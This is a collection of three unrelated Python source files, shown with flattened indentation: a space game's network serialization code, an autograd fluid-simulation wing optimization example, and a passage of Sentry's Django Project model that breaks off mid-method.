self.down = False
def dump(self):
dump = "%i;%i;%i;%i" % ( self.xc, self.yc, self.wc, self.hc )
for order in self.orders:
if isinstance( order, OrderMove ):
dump = dump + ";%i:%i:%i:%7f" % ( ids.O_MOVE, order.x, order.y, order.ori )
if isinstance( order, OrderStopMove ):
dump = dump + ";%i:%.2f" % ( ids.O_STOP_MOVE, order.ori )
elif isinstance( order, OrderRecallShips ):
dump = dump + ";%i:%i" % ( ids.O_RECALL_SHIPS, order.type )
elif isinstance( order, OrderLaunchShips ):
dump = dump + ";%i:%i" % ( ids.O_LAUNCH_SHIPS, order.type )
elif isinstance( order, OrderJumpNow ):
dump = dump + ";%i" % ( ids.O_JUMP_NOW )
elif isinstance( order, OrderJump ):
dump = dump + ";%i:%i:%i" % ( ids.O_JUMP, order.x, order.y )
elif isinstance( order, OrderLaunchMissile ):
dump = dump + ";%i:%i:%i:%i" % ( ids.O_LAUNCH_MISSILE, order.type, order.x, order.y )
elif isinstance( order, OrderAttack ):
dump = dump + ";%i:%i" % ( ids.O_ATTACK, order.obj )
elif isinstance( order, OrderOrbit ):
dump = dump + ";%i:%i" % ( ids.O_ORBIT, order.obj )
elif isinstance( order, OrderBuildTurret ):
dump = dump + ";%i:%i:%i" % ( ids.O_BUILD_TURRET, order.tp, order.type )
elif isinstance( order, OrderBuildShip ):
dump = dump + ";%i:%i:%i" % ( ids.O_BUILD_SHIP, order.type, order.rate )
elif isinstance( order, OrderBuildMissile ):
dump = dump + ";%i:%i:%i" % ( ids.O_BUILD_MISSILE, order.type, order.rate )
elif isinstance( order, OrderActivateTurret ):
dump = dump + ";%i:%i:%i" % ( ids.O_TURRET_ACTIVATE, order.turret, order.activate )
elif isinstance( order, OrderActivateShield ):
dump = dump + ";%i:%i" % ( ids.O_CHARGE, order.activate )
elif isinstance( order, OrderActivateRepair ):
dump = dump + ";%i:%i" % ( ids.O_REPAIR, order.activate )
elif isinstance( order, OrderSetRelation ):
dump = dump + ";%i:%s:%i" % ( ids.O_RELATION, order.other, order.level )
elif isinstance( order, OrderSelfDestruct ):
dump = dump + ";%i" % ( ids.O_SELF_DESTRUCT )
elif isinstance( order, OrderBroadcast ):
dump = dump + ";%i:%s" % ( ids.O_BROADCAST, order.text )
elif isinstance( order, OrderDirectedCast ):
dump = dump + ";%i:%s:%i:%i" % ( ids.O_DIRECTED_CAST, order.text, order.x, order.y )
return dump
def CopyCOInput( input ):
return COInput( input.xc, input.yc, input.wc, input.hc )
def LoadCOInput( text ):
es = text.split(";")
inputs = COInput( int(es[0]), int(es[1]), int(es[2]), int(es[3]) )
if len(es[4:]) > 0:
for e in es[4:]: #range(int(es[4])):
os = e.split(":")
if int(os[0]) == ids.O_MOVE:
order = OrderMove( int(os[1]), int(os[2]), float(os[3]) )
elif int(os[0]) == ids.O_STOP_MOVE:
order = OrderStopMove( float(os[1]) )
elif int(os[0]) == ids.O_RECALL_SHIPS:
order = OrderRecallShips( int(os[1]) )
elif int(os[0]) == ids.O_LAUNCH_SHIPS:
order = OrderLaunchShips( int(os[1]) )
elif int(os[0]) == ids.O_JUMP_NOW:
order = OrderJumpNow()
elif int(os[0]) == ids.O_JUMP:
order = OrderJump( (int(os[1]), int(os[2])) )
elif int(os[0]) == ids.O_LAUNCH_MISSILE:
order = OrderLaunchMissile( int(os[1]), (int(os[2]), int(os[3])) )
elif int(os[0]) == ids.O_ATTACK:
order = OrderAttack( int(os[1]) )
elif int(os[0]) == ids.O_ORBIT:
order = OrderOrbit( int(os[1]) )
elif int(os[0]) == ids.O_BUILD_TURRET:
order = OrderBuildTurret( int(os[1]), int(os[2]) )
elif int(os[0]) == ids.O_BUILD_SHIP:
order = OrderBuildShip( int(os[1]), int(os[2]) )
elif int(os[0]) == ids.O_BUILD_MISSILE:
order = OrderBuildMissile( int(os[1]), int(os[2]) )
elif int(os[0]) == ids.O_TURRET_ACTIVATE:
order = OrderActivateTurret( int(os[1]), int(os[2]) )
elif int(os[0]) == ids.O_CHARGE:
order = OrderActivateShield( int(os[1]) )
elif int(os[0]) == ids.O_REPAIR:
order = OrderActivateRepair( int(os[1]) )
elif int(os[0]) == ids.O_RELATION:
order = OrderSetRelation( os[1], int(os[2]) )
elif int(os[0]) == ids.O_SELF_DESTRUCT:
order = OrderSelfDestruct()
elif int(os[0]) == ids.O_BROADCAST:
order = OrderBroadcast( os[1] )
elif int(os[0]) == ids.O_DIRECTED_CAST:
order = OrderDirectedCast( os[1], (int(os[2]), int(os[3])) )
# order = OrderMove( int(es[5+3*i]), int(es[6+3*i]), float(es[7+3*i]) )
inputs.orders.append( order )
return inputs
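# Round-trip sketch (with hypothetical ids -- the real numeric values live in
# ids.py): assuming ids.O_MOVE == 0, the dump "0;0;320;320;0:100:200:1.570800"
# decodes into a COInput whose viewport is (0, 0, 320, 320) and whose single
# order is OrderMove(100, 200, 1.5708). dump() and LoadCOInput are intended
# to be inverses of each other across the wire.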
# objects -> client
class COObject:
def __init__(self,type,xp,yp,zp,ori,uid,selectRadius,relation=ids.U_NEUTRAL):
self.type = type
self.xp = xp # int(xp+0.5)
self.yp = yp # int(yp+0.5)
self.zp = zp
self.ori = ori
self.uid = uid
self.selectRadius = selectRadius
self.relation = relation
def dump(self):
dump = "%i;%i;%i;%i;%.2f;%i;%i;%i" % ( self.type, self.xp, self.yp, self.zp, self.ori, self.uid, self.selectRadius, self.relation )
return dump
def LoadCOObject( text ):
es = text.split(";")
return COObject( int(es[0]), int(es[1]), int(es[2]), int(es[3]), float(es[4]), int(es[5]), int(es[6]), int(es[7]) )
class COObjects:
def __init__(self,coobjects):
self.coobjects = coobjects
def dump(self):
dumps = [ coobject.dump() for coobject in self.coobjects ]
dump = ":".join(dumps)
return dump
def LoadCOObjects( text ):
bs = text.split(":")
coobjects = []
coobject = None
for b in bs:
try:
coobject = LoadCOObject( b )
coobjects.append( coobject )
        except Exception, ex:
            print "failed LoadCOObject:", ex
return COObjects( coobjects )
# stats -> client
class COPlayerStatus:
def __init__(self, gameTick, dead, ore, maxOre,
energy, maxEnergy, shieldIntegrity, hullIntegrity,
canJump, repairing, charging, hangarSpace,
shipsSpace, missilesSpace, jumpCharge, jumpRecover,
oreInProcess, turrets, missiles, ships,
radars, ennemyInRadar=False, dangerInRadar=False ): # , buildableTurrets
self.gameTick = gameTick
self.dead = dead
self.ore = ore
self.maxOre = maxOre
self.energy = energy
self.maxEnergy = maxEnergy
self.shieldIntegrity = shieldIntegrity
self.hullIntegrity = hullIntegrity
self.hangarSpace = hangarSpace
self.shipsSpace = shipsSpace
self.missilesSpace = missilesSpace
self.oreInProcess = oreInProcess
self.canJump = canJump
self.jumpCharge = jumpCharge
self.jumpRecover = jumpRecover
self.turrets = turrets
self.missiles = missiles
self.ships = ships
self.radars = radars
self.repairing = repairing
self.charging = charging
self.ennemyInRadar = ennemyInRadar
self.dangerInRadar = dangerInRadar
def dump(self):
if self.dead:
dump = "%i" % ( self.gameTick )
else:
dump = "%i;%i;%i;%i;%i;%.2f;%.2f;%i;%i;%i;%i;%i;%i;%i;%i;%i;%i" % ( self.gameTick, self.ore, self.maxOre, self.energy, self.maxEnergy, self.shieldIntegrity, self.hullIntegrity, self.canJump, self.repairing, self.charging, self.hangarSpace, self.shipsSpace, self.missilesSpace, self.jumpCharge, self.jumpRecover, self.ennemyInRadar, self.dangerInRadar )
dump = dump + ";"
for oip in self.oreInProcess:
dump = dump + "%i:"% oip
dump = dump + ";"
for turret in self.turrets:
dump = dump + "%i:%i:%i:%.2f:%.2f:%i:%i:%i:%i:%i:%i:%i:%i:" % ( turret.type, turret.xp, turret.yp, turret.minAngle, turret.maxAngle, turret.buildPerc,turret.range,turret.on,turret.activable,turret.useEnergy,turret.useOre,turret.energyRebate, turret.oreRebate )
for bt in turret.buildables:
dump = dump + "%i_%i/" % ( bt.type, bt.canBuild ) # , bt.energyCost, bt.oreCost, bt.category )
dump = dump + "|"
dump = dump + ";"
for ship in self.missiles:
dump = dump + "%i:%i:%i:%i:%i:%i:%i|" % ( ship.type, ship.usable, ship.canLaunch, ship.nbr, ship.buildPerc, ship.canBuild, ship.show )
dump = dump + ";"
for ship in self.ships:
dump = dump + "%i:%i:%i:%i:%i:%i:%i|" % ( ship.type, ship.usable, ship.canLaunch, ship.nbr, ship.buildPerc, ship.canBuild, ship.show )
dump = dump + ";"
for radar in self.radars:
dump = dump + "%i:%i:%i|" % ( radar.xr, radar.yr, radar.range )
return dump
def LoadCOPlayerStatus( text ):
es = text.split(";")
oreInProcess = []
turrets = []
missiles = []
ships = []
buildableTurrets = []
radars = []
if len(es)==2: # dead
for o in es[ 1 ].split("|"):
if len( o ) > 0:
i = o.split(":")
radars.append( CORadar( (int(i[0]), int(i[1])), int(i[2]) ) )
stats = COPlayerStatus( int(es[0]), True, 0, 1, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0,0, 0, oreInProcess, turrets, missiles, ships, radars )
else:
for o in es[ 17 ].split(":"):
if len( o ) > 0:
oreInProcess.append( int(o) )
for o in es[ 18 ].split("|"):
if len( o ) > 0:
i = o.split(":")
buildables = []
for b in i[ 13 ].split("/"):
if len( b ) > 0:
bi = b.split("_")
buildables.append( COBuildable( int(bi[0]), int(bi[1]) ) )
turrets.append( COTurret( int(i[0]), int(i[1]), int(i[2]), float(i[3]), float(i[4]), int(i[5]), int(i[6]), int(i[7]), int(i[8]), int(i[9]), int(i[10]), int(i[11]), int(i[12]), buildables ) )
for o in es[ 19 ].split("|"):
if len( o ) > 0:
i = o.split(":")
missiles.append( COShips( int(i[0]), int(i[1]), int(i[2]), int(i[3]), int(i[4]), int(i[5]), int(i[6]) ) )
for o in es[ 20 ].split("|"):
if len( o ) > 0:
i = o.split(":")
ships.append( COShips( int(i[0]), int(i[1]), int(i[2]), int(i[3]), int(i[4]), int(i[5]), int(i[6]) ) )
for o in es[ 21 ].split("|"):
if len( o ) > 0:
i = o.split(":")
radars.append( CORadar( (int(i[0]), int(i[1])), int(i[2]) ) )
stats = COPlayerStatus( int(es[0]), False, int(es[1]), int(es[2]), int(es[3]), int(es[4]), float(es[5]), float(es[6]), int(es[7]), int(es[8]), int(es[9]), int(es[10]), int(es[11]), int(es[12]), int(es[13]), int(es[14]), oreInProcess, turrets, missiles, ships, radars, int(es[15]), int(es[16]) )
return stats
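# Wire-format note: a dead player's status dumps as just
# "<gameTick>;<radars>", which is why the loader switches on len(es) == 2;
# live players carry the full ore/turret/missile/ship/radar layout parsed in
# the else branch above.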
class COPossible:
def __init__( self, ship, race, nbrTurrets, speed, shield, hull, hangar, canJump, civilians ):
self.ship = ship
self.race = race
self.nbrTurrets = nbrTurrets
self.speed = speed
self.shield = shield
self.hull = hull
self.hangar = hangar
self.canJump = canJump
self.civilians = civilians
class COPossibles:
def __init__( self, ships ):
self.ships = ships
def dump(self):
strings = [ "%i;%i;%i;%i;%i;%i;%i;%i;%i"%(ship.ship, ship.race, ship.nbrTurrets, ship.speed, ship.shield, ship.hull, ship.hangar, ship.canJump, ship.civilians) for ship in self.ships ]
return ":".join( strings )
def LoadCOPossibles( text ):
ss = text.split(":")
ships = []
for s in ss:
if len( s ) > 0:
es = s.split(";")
ships.append( COPossible( int(es[0]), int(es[1]), int(es[2]), int(es[3]), int(es[4]), int(es[5]), int(es[6]), int(es[7]), int(es[8]) ) )
return COPossibles( ships )
class COPlayer:
def __init__( self, name, race, relIn, relOut, isHuman ):
self.name = name
self.race = race
self.relIn = relIn
self.relOut = relOut
self.isHuman = isHuman
class COPlayers:
def __init__( self, players ):
self.players = players
def dump(self):
strings = [ "%s;%i;%i;%i;%i"%(player.name,player.race,player.relIn,player.relOut,player.isHuman) for player in self.players ]
return ":".join( strings )
def LoadCOPlayers( text ):
ss = text.split(":")
players = []
for s in ss:
if len( s ) > 0:
# print s
es = s.split(";")
players.append( COPlayer( es[0], int(es[1]), int(es[2]), int(es[3]), int(es[4]) ) )
# print "loaded", players
return COPlayers( players ) # COPlayers( [ es = s.split(";"); COPlayer( es[0], int(es[1]), int(es[2]), int(es[3]), int(es[4]) ) for s in ss ] )
class COTurret:
def __init__( self, type, xp, yp, minAngle, maxAngle, buildPerc, range, on, activable, useEnergy, useOre, energyRebate, oreRebate, buildables ):
self.type = type
self.xp = xp
self.yp = yp
self.minAngle = minAngle
self.maxAngle = maxAngle
self.buildPerc = buildPerc
self.range = range
self.on = on
self.activable = activable
self.useEnergy = useEnergy
self.useOre = useOre
self.buildables = buildables
self.energyRebate = energyRebate
self.oreRebate = oreRebate
class COShips:
def __init__( self, type, usable, canLaunch, nbr, buildPerc, canBuild, show ):
self.type = type
self.usable = usable
self.canLaunch = canLaunch
self.nbr = nbr
self.buildPerc = buildPerc
self.canBuild = canBuild
self.show = show
class COBuildable:
def __init__( self, type, canBuild ): # , energyCost, oreCost, category
self.type = type
self.canBuild = canBuild
# self.energyCost = energyCost
# self.oreCost = oreCost
# self.category = category
class COAstre:
def __init__(self, type, xp, yp, radius=0 ):
self.type = type
self.xp = xp
self.yp = yp
self.radius = radius
def dump(self):
dump = "%i;%i;%i;%i;" % ( self.type, self.xp, self.yp, self.radius )
return dump
class CORadar:
def __init__( self, (xr,yr), range ):
self.xr = xr
self.yr = yr
self.range = range
def LoadCOAstre( text ):
    es = text.split(";")
    # COAstre.dump() ends with a trailing ";", so es[4] is always empty.
    return COAstre( int(es[0]), int(es[1]), int(es[2]), int(es[3]) )
class COGfxs:
def __init__(self, gfxs ):
self.gfxs = gfxs
def dump(self):
dump = "%i" % ( len(self.gfxs) )
for gfx in self.gfxs:
if isinstance( gfx, GfxLaser ):
dump = dump + ";%i:%i:%i:%i:%i:%i:%i:%i" % (ids.G_LASER_SMALL, gfx.xp,gfx.yp,gfx.z,gfx.xd,gfx.yd, gfx.width, gfx.color)
elif isinstance( gfx, GfxExplosion ):
dump = dump + ";%i:%i:%i:%i:%i:%i" % (ids.G_EXPLOSION, gfx.xp,gfx.yp,gfx.radius,gfx.sound,gfx.delai)
elif isinstance( gfx, GfxShield ):
dump = dump + ";%i:%i:%i:%i:%i:%.3f:%.3f" % (ids.G_SHIELD, gfx.xp,gfx.yp,gfx.radius,gfx.strength,gfx.angle,gfx.hit)
elif isinstance( gfx, GfxExhaust ): # careful, GfxExhaust inherits of GfxFragment
pass # TODO, removed because not used on client side
elif isinstance( gfx, GfxFragment ):
dump = dump + ";%i:%i:%i:%i:%.2f:%.2f:%.2f:%.2f:%i:%i" % (ids.G_FRAGMENT, gfx.xp,gfx.yp,gfx.zp,gfx.ori,gfx.xi,gfx.yi,gfx.ri,gfx.type,gfx.ttl)
elif isinstance( gfx, GfxLightning ):
dump = dump + ";%i:%i:%i:%i:%i:%i:%i" % (ids.G_LIGHTNING, gfx.xp,gfx.yp,gfx.z,gfx.xd,gfx.yd, gfx.strength )
elif isinstance( gfx, GfxJump ):
dump = dump + ";%i:%i:%i:%i:%i:%i" % (ids.G_JUMP, gfx.xp,gfx.yp,gfx.radius,gfx.angle*100,gfx.delai)
return dump
def LoadCOGfxs( text ):
gfxs = []
es = text.split(";")
n = int(es[0])
for e in es[1:]:
ss = e.split(":")
if int(ss[ 0 ]) == ids.G_LASER_SMALL:
gfx = GfxLaser( (int(ss[1]),int(ss[2])), int(ss[3]), (int(ss[4]),int(ss[5])), int(ss[6]), int(ss[7]) )
elif int(ss[ 0 ]) == ids.G_EXPLOSION:
gfx = GfxExplosion( (int(ss[1]),int(ss[2])), int(ss[3]), int(ss[4]), int(ss[5]) )
elif int(ss[ 0 ]) == ids.G_SHIELD:
gfx = GfxShield( (int(ss[1]),int(ss[2])), int(ss[3]), int(ss[4]), float(ss[5]), float(ss[6]) )
elif int(ss[ 0 ]) == ids.G_FRAGMENT:
gfx = GfxFragment( (int(ss[1]),int(ss[2])), int(ss[3]), float(ss[4]), float(ss[5]), float(ss[6]), float(ss[7]), int(ss[8]), int(ss[9]) )
elif int(ss[ 0 ]) == ids.G_EXHAUST:
gfx = GfxExhaust( (int(ss[1]),int(ss[2])), int(ss[3]), float(ss[4]), float(ss[5]), float(ss[6]), float(ss[7]) )
elif int(ss[ 0 ]) == ids.G_LIGHTNING:
gfx = GfxLightning( (int(ss[1]),int(ss[2])), int(ss[3]), (int(ss[4]),int(ss[5])), int(ss[6]) )
elif int(ss[ 0 ]) == ids.G_JUMP:
            gfx = GfxJump( (int(ss[1]),int(ss[2])), int(ss[3]), float(ss[4])/100, int(ss[5]) )
        else:
            print "unknown gfx id:", int(ss[ 0 ])
            continue
        gfxs.append( gfx )
return gfxs
class COScore:
def __init__( self, playerName, score, deaths ):
pass
class COEnd:
def __init__( self, scores, ):
pass
class COBegin:
pass
class COTutorialMsg:
pass
|
from __future__ import absolute_import
from __future__ import print_function
import autograd.numpy as np
from autograd import value_and_grad
from scipy.optimize import minimize
import matplotlib.pyplot as plt
import os
from builtins import range
rows, cols = 40, 60
# Fluid simulation code based on
# "Real-Time Fluid Dynamics for Games" by Jos Stam
# http://www.intpowertechcorp.com/GDC03.pdf
def occlude(f, occlusion):
return f * (1 - occlusion)
def project(vx, vy, occlusion):
"""Project the velocity field to be approximately mass-conserving,
using a few iterations of Gauss-Seidel."""
p = np.zeros(vx.shape)
div = -0.5 * (np.roll(vx, -1, axis=1) - np.roll(vx, 1, axis=1)
+ np.roll(vy, -1, axis=0) - np.roll(vy, 1, axis=0))
div = make_continuous(div, occlusion)
for k in range(50):
p = (div + np.roll(p, 1, axis=1) + np.roll(p, -1, axis=1)
+ np.roll(p, 1, axis=0) + np.roll(p, -1, axis=0))/4.0
p = make_continuous(p, occlusion)
vx = vx - 0.5*(np.roll(p, -1, axis=1) - np.roll(p, 1, axis=1))
vy = vy - 0.5*(np.roll(p, -1, axis=0) - np.roll(p, 1, axis=0))
vx = occlude(vx, occlusion)
vy = occlude(vy, occlusion)
return vx, vy
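# Note on project(): the pressure solve is 50 fixed sweeps of a vectorized
# Jacobi-style relaxation (each cell is recomputed from the previous iterate
# of its four neighbours plus the local divergence), after which the pressure
# gradient is subtracted from (vx, vy). The iteration count is an empirical
# budget, not a convergence test.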
def advect(f, vx, vy):
"""Move field f according to x and y velocities (u and v)
using an implicit Euler integrator."""
rows, cols = f.shape
cell_xs, cell_ys = np.meshgrid(np.arange(cols), np.arange(rows))
center_xs = (cell_xs - vx).ravel()
center_ys = (cell_ys - vy).ravel()
# Compute indices of source cells.
    left_ix = np.floor(center_ys).astype(int)
    top_ix = np.floor(center_xs).astype(int)
rw = center_ys - left_ix # Relative weight of right-hand cells.
bw = center_xs - top_ix # Relative weight of bottom cells.
left_ix = np.mod(left_ix, rows) # Wrap around edges of simulation.
right_ix = np.mod(left_ix + 1, rows)
top_ix = np.mod(top_ix, cols)
bot_ix = np.mod(top_ix + 1, cols)
# A linearly-weighted sum of the 4 surrounding cells.
flat_f = (1 - rw) * ((1 - bw)*f[left_ix, top_ix] + bw*f[left_ix, bot_ix]) \
+ rw * ((1 - bw)*f[right_ix, top_ix] + bw*f[right_ix, bot_ix])
return np.reshape(flat_f, (rows, cols))
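# advect() is the classic semi-Lagrangian step: trace each cell centre one
# step backwards along the velocity field, then bilinearly interpolate the
# four surrounding source cells. For example, with vx = 0.5 a cell samples
# halfway to its neighbour, a 50/50 blend of the two source cells.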
def make_continuous(f, occlusion):
non_occluded = 1 - occlusion
num = np.roll(f, 1, axis=0) * np.roll(non_occluded, 1, axis=0)\
+ np.roll(f, -1, axis=0) * np.roll(non_occluded, -1, axis=0)\
+ np.roll(f, 1, axis=1) * np.roll(non_occluded, 1, axis=1)\
+ np.roll(f, -1, axis=1) * np.roll(non_occluded, -1, axis=1)
den = np.roll(non_occluded, 1, axis=0)\
+ np.roll(non_occluded, -1, axis=0)\
+ np.roll(non_occluded, 1, axis=1)\
+ np.roll(non_occluded, -1, axis=1)
return f * non_occluded + (1 - non_occluded) * num / ( den + 0.001)
def sigmoid(x):
return 0.5*(np.tanh(x) + 1.0) # Output ranges from 0 to 1.
def simulate(vx, vy, num_time_steps, occlusion, ax=None, render=False):
occlusion = sigmoid(occlusion)
# Disallow occlusion outside a certain area.
mask = np.zeros((rows, cols))
mask[10:30, 10:30] = 1.0
occlusion = occlusion * mask
# Initialize smoke bands.
red_smoke = np.zeros((rows, cols))
    red_smoke[rows//4:rows//2] = 1
blue_smoke = np.zeros((rows, cols))
    blue_smoke[rows//2:3*rows//4] = 1
print("Running simulation...")
vx, vy = project(vx, vy, occlusion)
for t in range(num_time_steps):
plot_matrix(ax, red_smoke, occlusion, blue_smoke, t, render)
vx_updated = advect(vx, vx, vy)
vy_updated = advect(vy, vx, vy)
vx, vy = project(vx_updated, vy_updated, occlusion)
red_smoke = advect(red_smoke, vx, vy)
red_smoke = occlude(red_smoke, occlusion)
blue_smoke = advect(blue_smoke, vx, vy)
blue_smoke = occlude(blue_smoke, occlusion)
plot_matrix(ax, red_smoke, occlusion, blue_smoke, num_time_steps, render)
return vx, vy
def plot_matrix(ax, r, g, b, t, render=False):
if ax:
plt.cla()
ax.imshow(np.concatenate((r[...,np.newaxis], g[...,np.newaxis], b[...,np.newaxis]), axis=2))
ax.set_xticks([])
ax.set_yticks([])
plt.draw()
if render:
plt.savefig('step{0:03d}.png'.format(t), bbox_inches='tight')
plt.pause(0.001)
if __name__ == '__main__':
simulation_timesteps = 20
print("Loading initial and target states...")
init_vx = np.ones((rows, cols))
init_vy = np.zeros((rows, cols))
# Initialize the occlusion to be a block.
init_occlusion = -np.ones((rows, cols))
init_occlusion[15:25, 15:25] = 0.0
init_occlusion = init_occlusion.ravel()
def drag(vx): return np.mean(init_vx - vx)
def lift(vy): return np.mean(vy - init_vy)
def objective(params):
cur_occlusion = np.reshape(params, (rows, cols))
final_vx, final_vy = simulate(init_vx, init_vy, simulation_timesteps, cur_occlusion)
return -lift(final_vy) / drag(final_vx)
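    # Maximising lift-to-drag by minimising its negation: autograd
    # differentiates straight through all 20 simulation steps, so the
    # gradient of this scalar with respect to every occlusion pixel is
    # obtained automatically.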
# Specify gradient of objective function using autograd.
objective_with_grad = value_and_grad(objective)
fig = plt.figure(figsize=(8,8))
ax = fig.add_subplot(111, frameon=False)
def callback(weights):
cur_occlusion = np.reshape(weights, (rows, cols))
simulate(init_vx, init_vy, simulation_timesteps, cur_occlusion, ax)
print("Rendering initial flow...")
callback(init_occlusion)
print("Optimizing initial conditions...")
result = minimize(objective_with_grad, init_occlusion, jac=True, method='CG',
options={'maxiter':50, 'disp':True}, callback=callback)
print("Rendering optimized flow...")
final_occlusion = np.reshape(result.x, (rows, cols))
simulate(init_vx, init_vy, simulation_timesteps, final_occlusion, ax, render=True)
print("Converting frames to an animated GIF...") # Using imagemagick.
os.system("convert -delay 5 -loop 0 step*.png "
"-delay 250 step{0:03d}.png wing.gif".format(simulation_timesteps))
os.system("rm step*.png")
|
"""
sentry.models.project
~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2014 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import, print_function
import logging
import six
import warnings
from bitfield import BitField
from django.conf import settings
from django.db import models
from django.db.models import F
from django.utils import timezone
from django.utils.translation import ugettext_lazy as _
from sentry.app import locks
from sentry.constants import ObjectStatus
from sentry.db.models import (
BaseManager, BoundedPositiveIntegerField, FlexibleForeignKey, Model,
sane_repr
)
from sentry.db.models.utils import slugify_instance
from sentry.utils.colors import get_hashed_color
from sentry.utils.http import absolute_uri
from sentry.utils.retries import TimedRetryPolicy
# TODO(dcramer): pull in enum library
ProjectStatus = ObjectStatus
class ProjectManager(BaseManager):
# TODO(dcramer): we might want to cache this per user
def get_for_user(self, team, user, scope=None, _skip_team_check=False):
from sentry.models import Team
if not (user and user.is_authenticated()):
return []
if not _skip_team_check:
team_list = Team.objects.get_for_user(
organization=team.organization,
user=user,
scope=scope,
)
try:
team = team_list[team_list.index(team)]
except ValueError:
logging.info('User does not have access to team: %s', team.id)
return []
base_qs = self.filter(
team=team,
status=ProjectStatus.VISIBLE,
)
project_list = []
for project in base_qs:
project.team = team
project_list.append(project)
return sorted(project_list, key=lambda x: x.name.lower())
class Project(Model):
"""
    Projects are permission-based namespaces which generally
are the top level entry point for all data.
"""
__core__ = True
slug = models.SlugField(null=True)
name = models.CharField(max_length=200)
forced_color = models.CharField(max_length=6, null=True, blank=True)
organization = FlexibleForeignKey('sentry.Organization')
team = FlexibleForeignKey('sentry.Team')
public = models.BooleanField(default=False)
date_added = models.DateTimeField(default=timezone.now)
status = BoundedPositiveIntegerField(default=0, choices=(
(ObjectStatus.VISIBLE, _('Active')),
(ObjectStatus.PENDING_DELETION, _('Pending Deletion')),
(ObjectStatus.DELETION_IN_PROGRESS, _('Deletion in Progress')),
), db_index=True)
# projects that were created before this field was present
# will have their first_event field set to date_added
first_event = models.DateTimeField(null=True)
flags = BitField(flags=(
('has_releases', 'This Project has sent release data'),
), default=0, null=True)
objects = ProjectManager(cache_fields=[
'pk',
'slug',
])
class Meta:
app_label = 'sentry'
db_table = 'sentry_project'
unique_together = (('team', 'slug'), ('organization', 'slug'))
__repr__ = sane_repr('team_id', 'name', 'slug')
def __unicode__(self):
return u'%s (%s)' % (self.name, self.slug)
def next_short_id(self):
from sentry.models import Counter
return Counter.increment(self)
def save(self, *args, **kwargs):
if not self.slug:
lock = locks.get('slug:project', duration=5)
with TimedRetryPolicy(10)(lock.acquire):
slugify_instance(self, self.name, organization=self.organization)
super(Project, self).save(*args, **kwargs)
else:
super(Project, self).save(*args, **kwargs)
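    # Slug generation is serialised under the "slug:project" lock (acquired
    # via TimedRetryPolicy), so two concurrent saves in the same organization
    # cannot both claim the same auto-generated slug.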
def get_absolute_url(self):
return absolute_uri('/{}/{}/'.format(self.organization.slug, self.slug))
def merge_to(self, project):
from sentry.models import (
Group, GroupTagValue, Event, TagValue
)
if not isinstance(project, Project):
project = Project.objects.get_from_cache(pk=project)
for group in Group.objects.filter(project=self):
try:
other = Group.objects.get(
project=project,
)
except Group.DoesNotExist:
group.update(project=project)
GroupTagValue.objects.filter(
project_id=self.id,
group_id=group.id,
).update(project_id=project.id)
else:
Event.objects.filter(
group_id=group.id,
).update(group_id=other.id)
for obj in GroupTagValue.objects.filter(group=group):
obj2, created = GroupTagValue.objects.get_or_create(
project_id=project.id,
group_id=group.id,
key=obj.key,
value=obj.value,
defaults={'times_seen': obj.times_seen}
)
if not created:
obj2.update(times_seen=F('times_seen') + obj.times_seen)
for fv in TagValue.objects.filter(project=self):
TagValue.objects.get_or_create(project=project, key=fv.key, value=fv.value)
fv.delete()
self.delete()
def is_internal_project(self):
for value in (settings.SENTRY_FRONTEND_PROJECT, settings.SENTRY_PROJECT):
if six.text_type(self.id) == six.text_type(value) or six.text_type(self.slug) == six.text_type(value):
return True
return False
def get_tags(self, with_internal=True):
from sentry.models import TagKey
if not hasattr(self, '_tag_cache'):
tags = self.get_option('tags', None)
if tags is None:
tags = [
t for t in TagKey.objects.all_keys(self)
if with_internal or not t.startswith('sentry:')
]
self._tag_cache = tags
return self._tag_cache
# TODO: Make these a mixin
def update_option(self, *args, **kwargs):
from sentry.models import ProjectOption
return ProjectOption.objects.set_value(self, *args, **kwargs)
def get_option(self, *args, **kwargs):
from sentry.models import ProjectOption
return ProjectOption.objects.get_value(self, *args, **kwargs)
def delete_option(self, *args, **kwargs):
from sentry.models import ProjectOption
return ProjectOption.objects.unset_value(self, *args, **kwargs)
@property
def callsign(self):
return self.slug.upper()
@property
def color(self):
if self.forced_color is not None:
return '#%s' % self.forced_color
return get_hashed_color(self.callsign or self.slug)
@property
def member_set(self):
from sentry.models import OrganizationMember
return self.organization.member_set.filter(
id__in=OrganizationMember.objects.filter(
organizationmemberteam__is_active=True,
organizationmemberteam__team=self.team,
).values('id'),
user__is_active=True,
).distinct()
def has_access(self, user, access=None):
from sentry.models import AuthIdentity, OrganizationMember
warnings.warn('Project.has_access is deprecated.', DeprecationWarning)
queryset = self.member_set.filter(user=user)
if access is not None:
queryset = queryset.filter(type__lte=access)
try:
member = queryset.get()
except OrganizationMember.DoesNotExist:
return False
try:
auth_identity = AuthIdentity.objects.get(
auth_provider__organization=self.organization_id,
user=member.user_id,
)
except AuthIdentity.DoesNotExist:
return True
return auth_identity.is_valid(member)
def get_audit_log_data(self):
return {
'id': self.id,
'slug': self.slug,
'name': self.name,
'status': self.status,
'public': self.public,
}
def get_full_name(self):
if self.team.name not in self.name:
return '%s %s' % (self.team.name, self.name)
return self.name
def get_notification_recipients(self, user_option):
from sentry.models import UserOption
alert_settings = dict(
(o.user_id, int(o.value))
for o in UserOption.objects.filter(
project=self,
key=user_option,
)
)
disabled = set(u for u, v in six.iteritems(alert_settings) if v == 0)
member_set = set(self.member_set.exclude(
user__in=disabled,
).values_list('user', flat=True))
        # determine default settings for members who have no explicit alert option
members_to_check = set(u for u in member_set if u not in alert_settings)
if members_to_check:
disabled = set((
uo.user_id for uo in UserOption.objects.filter(
key='subscribe_by_default',
user__in=members_to_check,
)
if uo.value == '0'
))
member_set = [x for x in member_set if x not in disabled]
return member_set
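    # Resolution sketch (added note): an explicit 'mail:alert' value of 0
    # disables a member outright; members with no explicit value fall back to
    # their 'subscribe_by_default' user option, where '0' also disables.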
def get_mail_alert_subscribers(self):
user_ids = self.get_notification_recipients('mail:alert')
if not user_ids:
return []
from sentry.models import User
return list(User.objects.filter(id__in=user_ids))
def is_user_subscribed_to_mail_alerts(self, user):
from sentry.models import UserOption
is_enabled = UserOption.objects.get_value(
user,
'mail:alert',
project=self
)
if is_enabled is None:
is_enabled = UserOption.objects.get_value(
user,
'subscribe_by_default',
'1'
) == '1'
else:
is_enabled = bool(is_enabled)
return is_enabled
def is_user_subscribed_to_workflow(self, user):
from sentry.models import UserOption, UserOptionValue
opt_value = UserOption.objects.get_value(
